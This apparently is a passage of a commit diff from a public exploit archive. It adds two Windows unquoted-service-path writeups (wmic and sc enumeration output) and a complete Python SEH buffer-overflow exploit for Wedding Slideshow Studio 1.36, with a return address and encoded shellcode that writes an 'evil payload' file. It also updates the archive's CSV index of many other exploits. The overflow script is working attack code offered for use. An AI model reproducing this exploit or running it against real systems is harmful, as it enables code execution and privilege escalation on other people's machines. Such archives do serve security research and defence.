print "File cannot be created"

25
exploits/windows/local/48048.txt Normal file
View file

@ -0,0 +1,25 @@
Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksorter.com
Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe
Version: 12.4.16
Tested On: Windows 10 (32-bit)
C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """
Disk Sorter Enterprise C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe Auto
C:\Users\terran>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Disk Sorter Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Disk Sorter Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

24
exploits/windows/local/48049.txt Normal file
View file

@ -0,0 +1,24 @@
Exploit Title: Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksavvy.com
Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v12.3.18.exe
Version: 12.3.18
Tested On: Windows 10 (32-bit)
C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "Disk Savvy" | findstr /i /v """
Disk Savvy Enterprise C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe Auto
C:\Users\nightelf>sc qc "Disk Savvy Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Disk Savvy Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Disk Savvy Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

54
exploits/windows/local/48050.py Executable file
View file

@ -0,0 +1,54 @@
#Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a
## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
#5. The calculator runs successfully
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x100411fc)
#0x100411fc : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
long_buffer = "\x44" * 600
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
payload = buffer + nseh + seh + shellcode + long_buffer
try:
f=open("name.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

164
exploits/windows/remote/48053.py Executable file
View file

File diff suppressed because one or more lines are too long

17
files_exploits.csv
View file

@ -6666,6 +6666,7 @@ id,file,description,date,author,type,platform,port
47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios,
47995,exploits/linux/dos/47995.txt,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC)",2020-02-04,"Joe Vennix",dos,linux,
48005,exploits/windows/dos/48005.py,"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48006,exploits/windows/dos/48006.py,"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48008,exploits/linux/dos/48008.txt,"VIM 8.2 - Denial of Service (PoC)",2020-02-06,"Dhiraj Mishra",dos,linux,
@ -10936,13 +10937,22 @@ id,file,description,date,author,type,platform,port
47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows,
47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows,
47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows,
47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux,
47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux,
48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,
48028,exploits/windows/local/48028.py,"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow",2020-02-10,ZwX,local,windows,
48036,exploits/windows/local/48036.rb,"Ricoh Driver - Privilege Escalation (Metasploit)",2020-02-10,Metasploit,local,windows,
48039,exploits/windows/local/48039.py,"Torrent iPod Video Converter 1.51 - Stack Overflow",2020-02-11,boku,local,windows,
48041,exploits/windows/local/48041.py,"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow",2020-02-11,ZwX,local,windows,
48043,exploits/windows/local/48043.txt,"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path",2020-02-11,boku,local,windows,
48044,exploits/windows/local/48044.txt,"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path",2020-02-11,boku,local,windows,
48045,exploits/windows/local/48045.txt,"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path",2020-02-11,boku,local,windows,
48046,exploits/windows/local/48046.py,"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow",2020-02-11,ZwX,local,windows,
48048,exploits/windows/local/48048.txt,"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path",2020-02-11,boku,local,windows,
48049,exploits/windows/local/48049.txt,"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path",2020-02-11,boku,local,windows,
48050,exploits/windows/local/48050.py,"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow",2020-02-11,ZwX,local,windows,
48052,exploits/linux/local/48052.sh,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow",2020-02-06,"Dylan Katz",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17977,6 +17987,8 @@ id,file,description,date,author,type,platform,port
48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,
48037,exploits/linux_mips/remote/48037.rb,"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)",2020-02-10,Metasploit,remote,linux_mips,1900
48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
48051,exploits/freebsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,freebsd,
48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42332,3 +42344,6 @@ id,file,description,date,author,type,platform,port
48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,
48029,exploits/multiple/webapps/48029.txt,"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting",2020-02-10,"Prasenjit Kanti Paul",webapps,multiple,
48030,exploits/php/webapps/48030.txt,"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php,
48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80

Can't render this file because it is too large.